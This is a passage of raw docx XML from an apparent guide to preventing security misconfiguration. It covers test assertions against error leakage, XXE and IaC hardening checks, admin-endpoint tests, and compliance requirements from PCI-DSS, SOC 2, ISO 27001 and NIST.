          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    assert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b"Traceback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (most recent call last)" not in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>response.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5BA26F65" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    assert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b"sqlalchemy.orm.exc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">" not in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>response.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01986617" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    # Ensure the user gets a sanitized payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E911F27" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformattedChar"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    assert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b"Invalid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> request parameters provided." in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>response.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3064E7BF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>XML Parser Hardening Unit Tests (CWE-611 Prevention):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> When patching XML processing capabilities, write a unit test that attempts to execute an XML External Entity (XXE) injection using a local file URI loopback. The test should assert that the parser throws a validation exception or cleanly ignores the entity reference instead of rendering it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B61C1"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Infrastructure &amp; Pipeline Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7781FB02" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Infrastructure as Code (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>IaC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>) Linting:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integrate static analysis checks like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Checkov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tfsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> into pre-commit hooks or deployment pipelines. The build must break automatically if a template exposes a port publicly ( </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>0.0.0.0/0</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> ), enables default administrative logins, or defines an unencrypted database variable string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50876A05" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dynamic Endpoint Assertions:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement automated container suite testing (e.g., using Postman/Newman collections or custom bash scripts) to hit administrative interfaces like </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/actuator</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> , or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>/manager</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> . The test asserts a strict </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>403 Forbidden</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="HTMLPreformatted"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
        <w:t>404 Not Found</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> response code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FB2A0A" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Compliance Standards &amp; Regulatory Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F88B4DF"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Because Security Misconfiguration points to a failure in operational governance, every major international compliance structure explicitly mandates its prevention, auditing, and continuous testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8FB6EF"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PCI-DSS v4.0 (Payment Card Industry Data Security Standard)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7669EC8D" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Requirement 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Apply Secure Configurations to All System Components.</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> This section explicitly forbids keeping vendor-supplied default passwords, mandates the removal of unnecessary software functions/ports, and dictates the development of documented hardening standards for all system components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A4D5A2" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Requirement 11:</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Test Security of Systems and Networks Regularly.</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mandates quarterly external and internal vulnerability scanning to identify configuration flaws before they hit production ecosystems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A47DCB"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SOC 2 Type II (Trust Services Criteria)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7ABBB3" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CC6.1 &amp; CC6.2 (Logical Access Controls):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Requires organizations to demonstrate that credentials, system configurations, and cloud access mechanisms are strictly managed under the Principle of Least Privilege. Leaving default framework settings or unhardened production networks active triggers an automatic qualification or failure during an audit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127F8B89"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ISO/IEC 27001:2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4218C183" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Control A.8.20 (Network Security):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dictates that networks must be securely managed and configured to isolate sensitive systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC4A803" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>Control A.8.9 (Configuration Management):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> A dedicated control requiring configurations (including security baselines) of software, networks, and cloud resources to be explicitly defined, monitored, reviewed, and locked down against drift.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756E6ABB"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Style w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>NIST SP 800-53 (Rev. 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28017A80" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>CM-6 (Configuration Settings):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Directly mandates that organizations establish, implement, and continuously monitor strict security configuration settings across all information systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC54FFF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00C93359">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>SI-11 (Error Handling):</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Requires the system to output unique error messages only for authorized personnel, preventing public information leakage via verbose application failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9ADF20" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>Operational &amp; Team Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6EA145" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00D66BA1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>1. The "Fix" Trade-offs: Balancing Security with Usability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122DBB52"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Locking down security configurations to the highest possible standard introduces an operational paradox: while it rarely drains heavy CPU or memory cycles, it significantly increases </w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t>system friction</w:t>
      </w:r>
      <w:r w:rsidRPr="0083079C">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> and impacts the developer experience (DX).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F77F7CD"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The following matrix highlights these impacts and the strategies used to balance them:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="PlainTable1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2097"/>
        <w:gridCol w:w="3066"/>
        <w:gridCol w:w="3718"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="788D1D09" w14:textId="77777777" w:rsidTr="00B064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6A6A76" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
